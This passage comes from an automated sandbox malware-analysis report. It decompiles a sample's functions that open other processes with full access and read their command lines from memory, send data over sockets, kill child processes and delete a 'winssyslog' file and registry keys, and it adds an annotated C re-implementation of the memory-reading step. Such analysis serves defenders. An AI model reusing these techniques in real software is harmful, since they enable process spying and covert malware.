                                                            							goto L14;
                                                            						} else {
                                                            							if(_t152 != 0xffffffff) {
                                                            								L5:
                                                            								return 0;
                                                            							} else {
                                                            								__imp__#111();
                                                            								if(_t152 == 0x2733) {
                                                            									goto L13;
                                                            								} else {
                                                            									goto L5;
                                                            								}
                                                            							}
                                                            						}
                                                            					}
                                                            				}
                                                            				L72:
                                                            			}

                                                            APIs
                                                            • WSAEventSelect.WS2_32(?,?,00000030), ref: 0464DCB6
                                                            • connect.WS2_32(?,?,00000010), ref: 0464DCDE
                                                            • WSAGetLastError.WS2_32(?,74CB4D40,?,0464D884,?,00000005), ref: 0464DCF1
                                                            • connect.WS2_32(?,?,00000010), ref: 0464DD25
                                                            • WSAEventSelect.WS2_32(?,?,00000023), ref: 0464DD38
                                                            • SetLastError.KERNEL32(00000000,?,74CB4D40,?,0464D884,?,00000005), ref: 0464DD53
                                                            • GetLastError.KERNEL32(?,74CB4D40,?,0464D884,?,00000005), ref: 0464DD65
                                                            • WSASetLastError.WS2_32(00000000,?,74CB4D40,?,0464D884,?,00000005), ref: 0464DD76
                                                            • send.WS2_32(?,00000000,00000000,00000000), ref: 0464DD8D
                                                            • WSAGetLastError.WS2_32(?,74CB4D40,?,0464D884,?,00000005), ref: 0464DD98
                                                            • GetCurrentThreadId.KERNEL32 ref: 0464DDFC
                                                            • GetCurrentThreadId.KERNEL32 ref: 0464DE00
                                                            • CreateWaitableTimerW.KERNEL32(00000000,00000000,00000000), ref: 0464DE97
                                                            • SetWaitableTimer.KERNEL32(00000000,?,?,00000000,00000000,00000000), ref: 0464DED5
                                                            • WSAWaitForMultipleEvents.WS2_32(?,?,00000000,000000FF,00000000,?,00000000,?,74CB4C30), ref: 0464DF4A
                                                            • GetLastError.KERNEL32(?,00000000,?,74CB4C30), ref: 0464DFDA
                                                            • WSAGetLastError.WS2_32(?,00000000,?,74CB4C30), ref: 0464E00D
                                                            • GetCurrentThreadId.KERNEL32 ref: 0464E036
                                                            • GetCurrentThreadId.KERNEL32 ref: 0464E05D
                                                            • CloseHandle.KERNEL32(00000000,?,00000000,?,74CB4C30), ref: 0464E06E
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: ErrorLast$CurrentThread$EventSelectTimerWaitableconnect$CloseCreateEventsHandleMultipleWaitsend
                                                            • String ID:
                                                            • API String ID: 2019364350-0
                                                            • Opcode ID: 24ffd4cd018eb31a665a29f9f083947bbe2c8460ed7bfb1f11420178a25c9af3
                                                            • Instruction ID: 4da8f091577d8bf4d8ecafb1ee5a9f4eb6c8934583ec6d58cd87afcd6bc0e655
                                                            • Opcode Fuzzy Hash: 24ffd4cd018eb31a665a29f9f083947bbe2c8460ed7bfb1f11420178a25c9af3
                                                            • Instruction Fuzzy Hash: 20C1BF70B00205AFEF249F64D848B6AB7A5FF94715F244229E519CB7C0FB76E811CB91
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 77%
                                                            			// Reads the command line of the process whose PID arrives in __edx and stores it
                                                            			// in the std::wstring-style object at __ecx (MSVC layout: buffer/pointer at +0, size
                                                            			// at +0x10, capacity at +0x14, where 7 is the in-place capacity). The hard-coded
                                                            			// sizes and offsets are those of the 32-bit PEB and RTL_USER_PROCESS_PARAMETERS.
                                                            			E04636060(void* __ebx, intOrPtr* __ecx, long __edx, void* __edi, void* __esi) {
                                                            				signed int _v12;
                                                            				intOrPtr _v16;
                                                            				DWORD* _v20;
                                                            				DWORD* _v36;
                                                            				void* _v44;
                                                            				signed int _v48;
                                                            				void _v112;
                                                            				void* _v568;
                                                            				void _v584;
                                                            				DWORD* _v588;
                                                            				DWORD* _v592;
                                                            				void* _v612;
                                                            				char _v616;
                                                            				signed int _t46;
                                                            				void* _t49;
                                                            				_Unknown_base(*)()* _t51;
                                                            				_Unknown_base(*)()* _t53;
                                                            				struct HINSTANCE__* _t54;
                                                            				signed int _t55;
                                                            				signed int _t59;
                                                            				signed int _t61;
                                                            				signed int _t80;
                                                            				void* _t90;
                                                            				intOrPtr _t104;
                                                            				intOrPtr* _t118;
                                                            				void* _t120;
                                                            				void* _t122;
                                                            				signed int _t123;
                                                            
                                                            				_t46 =  *0x4684008; // 0xd355be4e
                                                            				_v12 = _t46 ^ _t123; // /GS stack cookie; E04655AFE on each return is the cookie check
                                                            				_t118 = __ecx;
                                                            				_t90 = OpenProcess(0x1fffff, 0, __edx); // PROCESS_ALL_ACCESS to the target PID
                                                            				_t49 = GetCurrentProcess();
                                                            				_t120 = LoadLibraryA;
                                                            				_v588 = _t49;
                                                            				_v592 = 0;
                                                            				// IsWow64Process is resolved at run time and asked twice: _v592 = is the caller
                                                            				// a WoW64 process, _v588 = is the target a WoW64 process
                                                            				_t51 = GetProcAddress(LoadLibraryA("kernel32.dll"), "IsWow64Process");
                                                            				if(_t51 != 0) {
                                                            					 *_t51(_v588,  &_v592);
                                                            				}
                                                            				_v588 = 0;
                                                            				_t53 = GetProcAddress(LoadLibraryA("kernel32.dll"), "IsWow64Process");
                                                            				if(_t53 != 0) {
                                                            					 *_t53(_t90,  &_v588);
                                                            				}
                                                            				// Generic path unless the caller is WoW64 and the target is native 64-bit; that
                                                            				// combination, where the 32-bit PEB layout used below does not apply, goes to E04635DA0
                                                            				if(_v592 != 1 || _v588 != 0) {
                                                            					_t54 = GetModuleHandleA("ntdll.dll");
                                                            					__eflags = _t54;
                                                            					if(_t54 != 0) {
                                                            						L9:
                                                            						_t55 = GetProcAddress(_t54, "NtQueryInformationProcess");
                                                            						__eflags = _t55;
                                                            						if(_t55 == 0) {
                                                            							goto L18;
                                                            						} else {
                                                            							// NtQueryInformationProcess(target, ProcessBasicInformation = 0, &pbi, 0x18, NULL);
                                                            							// _v612 is pbi.PebBaseAddress
                                                            							_t59 =  *_t55(_t90, 0,  &_v616, 0x18, 0);
                                                            							__eflags = _t59;
                                                            							if(_t59 < 0) {
                                                            								goto L18;
                                                            							} else {
                                                            								// Copy 0x1d8 bytes of the target PEB; _v568 is PEB+0x10, i.e. ProcessParameters
                                                            								_t61 = ReadProcessMemory(_t90, _v612,  &_v584, 0x1d8, 0);
                                                            								__eflags = _t61;
                                                            								if(_t61 == 0) {
                                                            									goto L18;
                                                            								} else {
                                                            									// Copy the first 0x48 bytes of RTL_USER_PROCESS_PARAMETERS, which end with
                                                            									// CommandLine: _v48 = CommandLine.Length (+0x40), _v44 = CommandLine.Buffer (+0x44)
                                                            									__eflags = ReadProcessMemory(_t90, _v568,  &_v112, 0x48, 0);
                                                            									if(__eflags == 0) {
                                                            										goto L18;
                                                            									} else {
                                                            										// Allocate (Length/2 + 1) wide characters (L04655B55, likely the CRT allocator),
                                                            										// zero them (E0465DEA0, a memset-style fill), read Length bytes of the remote
                                                            										// command line, build a temporary wstring from the buffer (E046331B0, the same
                                                            										// routine used at L18) and free the buffer (L04655B0F)
                                                            										_push( ~(__eflags > 0) | ((_v48 & 0x0000ffff) + 0x00000001) * 0x00000002);
                                                            										_t122 = L04655B55( ~(__eflags > 0) | ((_v48 & 0x0000ffff) + 0x00000001) * 0x00000002, ReadProcessMemory, __eflags);
                                                            										E0465DEA0(_t118, _t122, 0, 2 + (_v48 & 0x0000ffff) * 2);
                                                            										ReadProcessMemory(_t90, _v44, _t122, _v48 & 0x0000ffff, 0);
                                                            										E046331B0( &_v36, _t118, _t122);
                                                            										L04655B0F(_t122);
                                                            										// Move the temporary into *__ecx: take over the heap pointer when capacity >= 8,
                                                            										// otherwise copy the in-place buffer; then reset the temporary and destroy it
                                                            										 *((intOrPtr*)(_t118 + 0x14)) = 7;
                                                            										 *(_t118 + 0x10) = 0;
                                                            										 *_t118 = 0;
                                                            										_t104 = _v16;
                                                            										__eflags = _t104 - 8;
                                                            										if(_t104 >= 8) {
                                                            											 *_t118 = _v36;
                                                            											_v36 = 0;
                                                            										} else {
                                                            											_t80 =  &(_v20[0]);
                                                            											__eflags = _t80;
                                                            											if(_t80 != 0) {
                                                            												E0465D060(_t118,  &_v36, _t80 + _t80);
                                                            												_t104 = _v16;
                                                            											}
                                                            										}
                                                            										 *(_t118 + 0x10) = _v20;
                                                            										 *((intOrPtr*)(_t118 + 0x14)) = _t104;
                                                            										_v16 = 7;
                                                            										_v20 = 0;
                                                            										_v36 = 0;
                                                            										E04633170( &_v36);
                                                            										__eflags = _v12 ^ _t123;
                                                            										return E04655AFE(_v12 ^ _t123);
                                                            									}
                                                            								}
                                                            							}
                                                            						}
                                                            					} else {
                                                            						_t54 = LoadLibraryA("ntdll.dll");
                                                            						__eflags = _t54;
                                                            						if(_t54 == 0) {
                                                            							L18:
                                                            							// Any failure above: *__ecx is assigned the constant wide string at 0x467c5d0
                                                            							E046331B0(_t118, _t118, 0x467c5d0);
                                                            							__eflags = _v12 ^ _t123;
                                                            							return E04655AFE(_v12 ^ _t123);
                                                            						} else {
                                                            							goto L9;
                                                            						}
                                                            					}
                                                            				} else {
                                                            					// Caller is WoW64 and the target is native 64-bit: E04635DA0 handles that case
                                                            					E04635DA0(_t90, _t118, _t90, _t118, _t120);
                                                            					return E04655AFE(_v12 ^ _t123);
                                                            				}
                                                            			}

                                                            APIs
                                                            • OpenProcess.KERNEL32(001FFFFF,00000000), ref: 04636080
                                                            • GetCurrentProcess.KERNEL32 ref: 04636088
                                                            • LoadLibraryA.KERNEL32(kernel32.dll,IsWow64Process), ref: 046360AE
                                                            • GetProcAddress.KERNEL32(00000000), ref: 046360B1
                                                            • LoadLibraryA.KERNEL32(kernel32.dll,IsWow64Process), ref: 046360DE
                                                            • GetProcAddress.KERNEL32(00000000), ref: 046360E1
                                                            • GetModuleHandleA.KERNEL32(ntdll.dll), ref: 04636128
                                                            • LoadLibraryA.KERNEL32(ntdll.dll), ref: 04636137
                                                            • GetProcAddress.KERNEL32(00000000,NtQueryInformationProcess), ref: 04636147
                                                            • ReadProcessMemory.KERNEL32(00000000,?,?,000001D8,00000000), ref: 04636188
                                                            • ReadProcessMemory.KERNEL32(00000000,?,?,00000048,00000000), ref: 046361A1
                                                            • ReadProcessMemory.KERNEL32(00000000,?,00000000,?,00000000), ref: 046361EE
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Process$AddressLibraryLoadMemoryProcRead$CurrentHandleModuleOpen
                                                            • String ID: IsWow64Process$NtQueryInformationProcess$kernel32.dll$ntdll.dll
                                                            • API String ID: 4184825023-3205649337
                                                            • Opcode ID: 781c16d589af7d2f5cae33aa9baaebfe6fe7ee31b0194206ca7d52b6cc4c5441
                                                            • Instruction ID: 65b7c8b5b9fbdf34fea195a033a46689f9db40afc98dec3810e7382b188e3910
                                                            • Opcode Fuzzy Hash: 781c16d589af7d2f5cae33aa9baaebfe6fe7ee31b0194206ca7d52b6cc4c5441
                                                            • Instruction Fuzzy Hash: 0651A371B01219BBDB249FA4DC4DBAE7778EF44705F000169E90AA6290FF78B944CBA5
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%
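The read sequence of E04636060 above (ProcessBasicInformation, then the PEB, then RTL_USER_PROCESS_PARAMETERS, then the CommandLine buffer), as an added example that is not code from this report or from the sample. It runs against a constructed byte array standing in for the target's address space, with assumed addresses and a constructed command line, so the hard-coded sizes and offsets the sample depends on (0x18, 0x1d8, 0x48, PEB+0x10, +0x40, +0x44) are checked with offsetof() at compile time on any platform; OpenProcess, NtQueryInformationProcess and ReadProcessMemory are replaced by stand-ins of the same shape. The WoW64 gate from the top of the function is included as its own function.

```c
/* Added example (not code from the Joe Sandbox report or from the sample):
 * re-implements the read sequence of E04636060 against a constructed,
 * in-process byte array standing in for the target's address space, so the
 * offsets the sample hard-codes can be checked with offsetof() on any OS. */
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

typedef struct { uint16_t Length, MaximumLength; uint32_t Buffer; } UNICODE_STRING32;

typedef struct {                     /* 32-bit PROCESS_BASIC_INFORMATION, 0x18 bytes */
    uint32_t ExitStatus, PebBaseAddress, AffinityMask, BasePriority,
             UniqueProcessId, InheritedFromUniqueProcessId;
} PBI32;

typedef struct {                     /* 32-bit PEB; the sample reads 0x1d8 bytes of it */
    uint8_t  InheritedAddressSpace, ReadImageFileExecOptions, BeingDebugged, BitField;
    uint32_t Mutant, ImageBaseAddress, Ldr, ProcessParameters;
    uint8_t  rest[0x1d8 - 0x14];
} PEB32;

typedef struct {                     /* first 0x48 bytes of 32-bit RTL_USER_PROCESS_PARAMETERS */
    uint32_t MaximumLength, Length, Flags, DebugFlags, ConsoleHandle, ConsoleFlags,
             StandardInput, StandardOutput, StandardError;
    UNICODE_STRING32 CurrentDirectoryDosPath; uint32_t CurrentDirectoryHandle;
    UNICODE_STRING32 DllPath, ImagePathName, CommandLine;
} RTL_USER_PROCESS_PARAMETERS32;

_Static_assert(sizeof(PBI32) == 0x18, "NtQueryInformationProcess length used by the sample");
_Static_assert(sizeof(PEB32) == 0x1d8, "first ReadProcessMemory length used by the sample");
_Static_assert(offsetof(PEB32, ProcessParameters) == 0x10, "_v568 = PEB + 0x10");
_Static_assert(sizeof(RTL_USER_PROCESS_PARAMETERS32) == 0x48, "second ReadProcessMemory length");
_Static_assert(offsetof(RTL_USER_PROCESS_PARAMETERS32, CommandLine) == 0x40, "_v48 = CommandLine.Length");
_Static_assert(offsetof(RTL_USER_PROCESS_PARAMETERS32, CommandLine)
               + offsetof(UNICODE_STRING32, Buffer) == 0x44, "_v44 = CommandLine.Buffer");

/* Constructed stand-in for the target's address space (assumed base address). */
#define REMOTE_BASE 0x00590000u
#define PEB_VA      (REMOTE_BASE + 0x0000u)
#define PARAMS_VA   (REMOTE_BASE + 0x1000u)
#define CMDLINE_VA  (REMOTE_BASE + 0x2000u)
static uint8_t g_remote[0x3000];

/* Stand-in for ReadProcessMemory: bounds-checked copy, nonzero on success. */
static int read_process_memory(uint32_t va, void *dst, size_t n) {
    if (va < REMOTE_BASE || va - REMOTE_BASE + n > sizeof g_remote) return 0;
    memcpy(dst, g_remote + (va - REMOTE_BASE), n);
    return 1;
}

/* Stand-in for NtQueryInformationProcess(target, ProcessBasicInformation, ...). */
static int32_t query_basic_information(PBI32 *pbi) {
    memset(pbi, 0, sizeof *pbi);
    pbi->PebBaseAddress = PEB_VA;
    return 0;                        /* STATUS_SUCCESS */
}

/* Populate the fake target with an ASCII command line stored as UTF-16LE. */
void build_remote_process(const char *cmdline) {
    PEB32 peb = {0};
    RTL_USER_PROCESS_PARAMETERS32 pp = {0};
    size_t n = strlen(cmdline);
    memset(g_remote, 0, sizeof g_remote);
    peb.ProcessParameters = PARAMS_VA;
    pp.CommandLine.Length = (uint16_t)(n * 2);
    pp.CommandLine.MaximumLength = (uint16_t)(n * 2 + 2);
    pp.CommandLine.Buffer = CMDLINE_VA;
    memcpy(g_remote + (PEB_VA - REMOTE_BASE), &peb, sizeof peb);
    memcpy(g_remote + (PARAMS_VA - REMOTE_BASE), &pp, sizeof pp);
    for (size_t i = 0; i < n; i++) g_remote[CMDLINE_VA - REMOTE_BASE + 2 * i] = (uint8_t)cmdline[i];
}

/* The sample's gate: the separate path (E04635DA0) is taken only when the
 * caller is a WoW64 (32-bit) process and the target is native 64-bit. */
int needs_wow64_path(int self_is_wow64, int target_is_wow64) {
    return self_is_wow64 == 1 && target_is_wow64 == 0;
}

/* Same four steps as E04636060; returns the command line length or -1. */
int read_remote_command_line(char *out, size_t cap) {
    PBI32 pbi; PEB32 peb; RTL_USER_PROCESS_PARAMETERS32 pp;
    if (query_basic_information(&pbi) < 0) return -1;
    if (!read_process_memory(pbi.PebBaseAddress, &peb, sizeof peb)) return -1;
    if (!read_process_memory(peb.ProcessParameters, &pp, sizeof pp)) return -1;
    size_t len = pp.CommandLine.Length;                 /* bytes of UTF-16LE */
    if (len / 2 + 1 > cap) return -1;
    uint8_t buf[512] = {0};                             /* sample: (Length/2+1)*2 bytes, zeroed */
    if (len > sizeof buf - 2 || !read_process_memory(pp.CommandLine.Buffer, buf, len)) return -1;
    for (size_t i = 0; i < len / 2; i++) out[i] = (char)buf[2 * i];  /* ASCII only, for display */
    out[len / 2] = '\0';
    return (int)(len / 2);
}

int main(void) {
    char out[256];
    build_remote_process("C:\\Windows\\explorer.exe");   /* constructed input */
    if (read_remote_command_line(out, sizeof out) > 0) printf("command line: %s\n", out);
    return 0;
}
```

On Windows the two stand-ins map one-to-one onto NtQueryInformationProcess(hProcess, ProcessBasicInformation, &pbi, sizeof pbi, NULL) and ReadProcessMemory with a handle from OpenProcess. The static assertions are the practitioner's check: they fail to compile if any of the three 32-bit layouts drifts from the sizes the sample hard-codes, which is also why the sample refuses this path from a WoW64 caller against a native 64-bit target, where the PEB is the 64-bit variant.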

                                                            C-Code - Quality: 100%
                                                            			// Destructor-style teardown of an object that owns a child process (+0x1c), three
                                                            			// threads (+0x20, +0x24, +0x28), four named-pipe handles (+0xc .. +0x18) and one
                                                            			// further handle (+8). The vtable pointer is rewritten three times (0x467eda4,
                                                            			// 0x467e8b0, 0x467e8c0) as each class in the hierarchy runs its destructor, the
                                                            			// usual MSVC pattern for inlined destructor chains.
                                                            			E04643E90(intOrPtr* __ecx) {
                                                            				void* _t24;
                                                            				void* _t25;
                                                            				void* _t26;
                                                            				void* _t27;
                                                            				int _t36;
                                                            				intOrPtr* _t42;
                                                            
                                                            				_t42 = __ecx;
                                                            				 *__ecx = 0x467eda4; // most-derived vtable
                                                            				TerminateThread( *(__ecx + 0x24), 0);
                                                            				TerminateProcess( *(_t42 + 0x1c), 0); // kill the child process
                                                            				TerminateThread( *(_t42 + 0x20), 0);
                                                            				WaitForSingleObject( *(_t42 + 0x28), 0x7d0); // give the third thread 2000 ms to exit, then kill it anyway
                                                            				TerminateThread( *(_t42 + 0x28), 0);
                                                            				// Disconnect each pipe that was actually created (a null handle is skipped)
                                                            				_t24 =  *(_t42 + 0xc);
                                                            				if(_t24 != 0) {
                                                            					DisconnectNamedPipe(_t24);
                                                            				}
                                                            				_t25 =  *(_t42 + 0x10);
                                                            				if(_t25 != 0) {
                                                            					DisconnectNamedPipe(_t25);
                                                            				}
                                                            				_t26 =  *(_t42 + 0x14);
                                                            				if(_t26 != 0) {
                                                            					DisconnectNamedPipe(_t26);
                                                            				}
                                                            				_t27 =  *(_t42 + 0x18);
                                                            				if(_t27 != 0) {
                                                            					DisconnectNamedPipe(_t27);
                                                            				}
                                                            				// Close every owned handle: the four pipes, the process and the three threads
                                                            				CloseHandle( *(_t42 + 0xc));
                                                            				CloseHandle( *(_t42 + 0x10));
                                                            				CloseHandle( *(_t42 + 0x14));
                                                            				CloseHandle( *(_t42 + 0x18));
                                                            				CloseHandle( *(_t42 + 0x1c));
                                                            				CloseHandle( *(_t42 + 0x20));
                                                            				CloseHandle( *(_t42 + 0x28));
                                                            				CloseHandle( *(_t42 + 0x24));
                                                            				 *_t42 = 0x467e8b0; // base-class destructor: it owns the handle at +8
                                                            				_t36 = CloseHandle( *(_t42 + 8));
                                                            				 *_t42 = 0x467e8c0; // root-class vtable
                                                            				return _t36;
                                                            			}

                                                            APIs
                                                            • TerminateThread.KERNEL32(?,00000000,?,00000000,046390F8,?,046878D8,00000000), ref: 04643EA5
                                                            • TerminateProcess.KERNEL32(?,00000000,?,00000000,046390F8,?,046878D8,00000000), ref: 04643EAC
                                                            • TerminateThread.KERNEL32(?,00000000,?,00000000,046390F8,?,046878D8,00000000), ref: 04643EB7
                                                            • WaitForSingleObject.KERNEL32(?,000007D0,?,00000000,046390F8,?,046878D8,00000000), ref: 04643EC1
                                                            • TerminateThread.KERNEL32(?,00000000,?,00000000,046390F8,?,046878D8,00000000), ref: 04643ECC
                                                            • DisconnectNamedPipe.KERNEL32(?,?,00000000,046390F8,?,046878D8,00000000), ref: 04643EDC
                                                            • DisconnectNamedPipe.KERNEL32(?,?,00000000,046390F8,?,046878D8,00000000), ref: 04643EE6
                                                            • DisconnectNamedPipe.KERNEL32(?,?,00000000,046390F8,?,046878D8,00000000), ref: 04643EF0
                                                            • DisconnectNamedPipe.KERNEL32(?,?,00000000,046390F8,?,046878D8,00000000), ref: 04643EFA
                                                            • CloseHandle.KERNEL32(?,?,00000000,046390F8,?,046878D8,00000000), ref: 04643F05
                                                            • CloseHandle.KERNEL32(?,?,00000000,046390F8,?,046878D8,00000000), ref: 04643F0A
                                                            • CloseHandle.KERNEL32(?,?,00000000,046390F8,?,046878D8,00000000), ref: 04643F0F
                                                            • CloseHandle.KERNEL32(?,?,00000000,046390F8,?,046878D8,00000000), ref: 04643F14
                                                            • CloseHandle.KERNEL32(?,?,00000000,046390F8,?,046878D8,00000000), ref: 04643F19
                                                            • CloseHandle.KERNEL32(?,?,00000000,046390F8,?,046878D8,00000000), ref: 04643F1E
                                                            • CloseHandle.KERNEL32(?,?,00000000,046390F8,?,046878D8,00000000), ref: 04643F23
                                                            • CloseHandle.KERNEL32(?,?,00000000,046390F8,?,046878D8,00000000), ref: 04643F28
                                                            • CloseHandle.KERNEL32(?,?,00000000,046390F8,?,046878D8,00000000), ref: 04643F33
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Similarity
                                                            • API ID: CloseHandle$DisconnectNamedPipeTerminate$Thread$ObjectProcessSingleWait
                                                            • String ID:
                                                            • API String ID: 1450516946-0
                                                            • Opcode ID: f55e0c41e36b661597b90835c75e7cdf00f7960a9f8198499ab3f7307a2fdf38
                                                            • Instruction ID: 7e00d4f1627fc440b7d83c320cb7ea5f4a9ff7dbf96183eeee55481ff49bbe5b
                                                            • Opcode Fuzzy Hash: f55e0c41e36b661597b90835c75e7cdf00f7960a9f8198499ab3f7307a2fdf38
                                                            • Instruction Fuzzy Hash: 1D11DD31A0062ABBDB156F26DC09B06BFB9FF48760B144113B40892A60EB75F8B1DFD0
                                                            Uniqueness
                                                            • Uniqueness Score: -1.00%

                                                            C-Code - Quality: 89%
                                                            			E0463A830(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags) {
                                                            				signed int _v8;
                                                            				char _v88;
                                                            				short _v608;
                                                            				short _v1128;
                                                            				void* _v1132;
                                                            				signed int _t22;
                                                            				void* _t50;
                                                            				signed int _t64;
                                                            				void* _t69;
                                                            
                                                            				_t69 = __eflags;
                                                            				_t63 = __esi;
                                                            				_t62 = __edi;
                                                            				_t22 =  *0x4684008; // 0xd355be4e
                                                            				_v8 = _t22 ^ _t64;
                                                            				_t50 = __ecx;
                                                            				_push(0);
                                                            				E04646370(__ecx, L"winssyslog",  &_v608, __edi, __esi, 8);
                                                            				DeleteFileW( &_v608);
                                                            				E046378B0(_t50, L"Control", 0x1fffffff, __edi, __esi, _t69);
                                                            				E04646050(_t50, L"Global",  &_v88, __edi, __esi);
                                                            				wsprintfW( &_v608, L"SOFTWARE\\Classes\\CLSID\\%s",  &_v88);
                                                            				_v1132 = 0;
                                                            				if(RegOpenKeyExW(0x80000002,  &_v608, 0, 0x20106,  &_v1132) == 0) {
                                                            					SHDeleteKeyW(_v1132, 0x467c5d0);
                                                            					RegCloseKey(_v1132);
                                                            				}
                                                            				E04646050(_t50, L"Pg",  &_v88, _t62, _t63);
                                                            				wsprintfW( &_v1128, L"SOFTWARE\\Classes\\CLSID\\%s",  &_v88);
                                                            				_v1132 = 0;
                                                            				if(RegOpenKeyExW(0x80000002,  &_v1128, 0, 0x20106,  &_v1132) == 0) {
                                                            					SHDeleteKeyW(_v1132, 0x467c5d0);
                                                            					RegCloseKey(_v1132);
                                                            				}
                                                            				CreateEventA(0, 1, 0, _t50 + 0xc);
                                                            				return E04655AFE(_v8 ^ _t64);
                                                            			}

                                                            APIs
                                                              • Part of subcall function 04646370: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 04646396
                                                            • DeleteFileW.KERNEL32(?), ref: 0463A864
                                                              • Part of subcall function 046378B0: wsprintfW.USER32 ref: 046378DF
                                                              • Part of subcall function 046378B0: RegCreateKeyExW.ADVAPI32(80000002,?,00000000,00000000,00000000,000F013F,00000000,?,00000000), ref: 04637919
                                                              • Part of subcall function 046378B0: RegSetValueExW.ADVAPI32(?,0467E09C,00000000,00000004,?,00000004), ref: 0463793A
                                                              • Part of subcall function 046378B0: RegCloseKey.ADVAPI32(?), ref: 04637950
                                                              • Part of subcall function 04646050: RegOpenKeyExW.KERNEL32(80000002,004F0053,00000000,00020119,?,00000000,00000000,0000038F), ref: 046461F1
                                                              • Part of subcall function 04646050: RegQueryValueExW.KERNEL32(?,0061004D,00000000,?,?,0000004A), ref: 0464621F
                                                              • Part of subcall function 04646050: RegCloseKey.ADVAPI32(?), ref: 04646235
                                                            • wsprintfW.USER32 ref: 0463A896
                                                            • RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00020106,00000000), ref: 0463A8C3
                                                            • SHDeleteKeyW.SHLWAPI(00000000,0467C5D0), ref: 0463A8D8
                                                            • RegCloseKey.ADVAPI32(00000000), ref: 0463A8E4
                                                            • wsprintfW.USER32 ref: 0463A907
                                                            • RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00020106,00000000), ref: 0463A934
                                                            • SHDeleteKeyW.SHLWAPI(00000000,0467C5D0), ref: 0463A949
                                                            • RegCloseKey.ADVAPI32(00000000), ref: 0463A955
                                                            • CreateEventA.KERNEL32(00000000,00000001,00000000,?), ref: 0463A965
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Similarity
                                                            • API ID: Close$DeleteOpenwsprintf$CreateValue$DirectoryEventFileQuerySystem
                                                            • String ID: Control$Global$SOFTWARE\Classes\CLSID\%s$winssyslog
                                                            • API String ID: 164381605-1386177884
                                                            • Opcode ID: 5455c326e5c93961222f17ad66c7b15dd3a4a712b086e2725ae6d8fa7b34c6b1
                                                            • Instruction ID: f0b13228d613b8cd32cad69503dcd74fa026e645424692e1002540ca7fe6bd83
                                                            • Opcode Fuzzy Hash: 5455c326e5c93961222f17ad66c7b15dd3a4a712b086e2725ae6d8fa7b34c6b1
                                                            • Instruction Fuzzy Hash: A9318171A40218ABEB10DFE0DC49F99737CEB45705F1041A8E605E6181FF766E58CF6A
                                                            Uniqueness
                                                            • Uniqueness Score: -1.00%

                                                            C-Code - Quality: 92%
                                                            			E04655860(LONG* __ecx, signed int __edx, long _a4) {
                                                            				long _v8;
                                                            				signed int _v12;
                                                            				void* _v16;
                                                            				long _t38;
                                                            				long _t52;
                                                            				unsigned int _t64;
                                                            				void* _t67;
                                                            				void* _t68;
                                                            				void** _t71;
                                                            				void* _t72;
                                                            				void** _t75;
                                                            				void* _t76;
                                                            				long _t82;
                                                            				LONG* _t88;
                                                            				void* _t89;
                                                            
                                                            				_v12 = __edx;
                                                            				_t88 = __ecx;
                                                            				if(_a4 == 0) {
                                                            					if(__ecx[1] == 0) {
                                                            						L24:
                                                            						return _t38;
                                                            					}
                                                            					_t64 = 0xaaaaaaab * __edx >> 0x20 >> 1;
                                                            					if(_t64 >= 0x3a98) {
                                                            						_t64 = 0x3a98;
                                                            					} else {
                                                            						if(_t64 <= 0x3e8) {
                                                            							_t64 = 0x3e8;
                                                            						}
                                                            					}
                                                            					_t38 =  <  ? 0x7fffffff : timeGetTime() - _t88[4];
                                                            					if(_t38 < _t64) {
                                                            						goto L24;
                                                            					} else {
                                                            						_t82 = 0;
                                                            						_a4 = 1;
                                                            						_v8 = 0;
                                                            						_t38 = InterlockedCompareExchange(_t88, 1, 0);
                                                            						asm("sbb ebx, ebx");
                                                            						_t67 =  ~_t38 + 1;
                                                            						if(_t67 == 0) {
                                                            							goto L24;
                                                            						}
                                                            						L12:
                                                            						if(_a4 != 0) {
                                                            							_a4 = 0;
                                                            							_t52 = timeGetTime();
                                                            							_t82 = _t52;
                                                            							_v8 = _t82;
                                                            							if(_t82 == 0) {
                                                            								_t52 = timeGetTime();
                                                            							}
                                                            							_t88[4] = _t52;
                                                            						}
                                                            						_t38 = _t88[2];
                                                            						_t75 =  *(_t38 + 4);
                                                            						if(_t75 == 0) {
                                                            							goto L22;
                                                            						}
                                                            						_t76 =  *_t75;
                                                            						_v16 = _t76;
                                                            						_t38 = _t82 -  *((intOrPtr*)(_t76 + 0x34));
                                                            						if(_t38 < _v12) {
                                                            							goto L22;
                                                            						}
                                                            						_t88[2] =  *(_t88[2] + 4);
                                                            						InterlockedDecrement( &(_t88[1]));
                                                            						_push(8);
                                                            						E04655B47(_t88[2]);
                                                            						_t89 = _t89 + 8;
                                                            						if(_t67 != 0) {
                                                            							 *_t88 = 0;
                                                            						}
